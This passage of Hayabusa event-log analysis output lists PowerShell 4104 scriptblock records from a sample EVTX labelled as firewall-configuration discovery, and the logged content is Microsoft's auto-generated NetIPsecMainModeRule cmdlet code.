Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 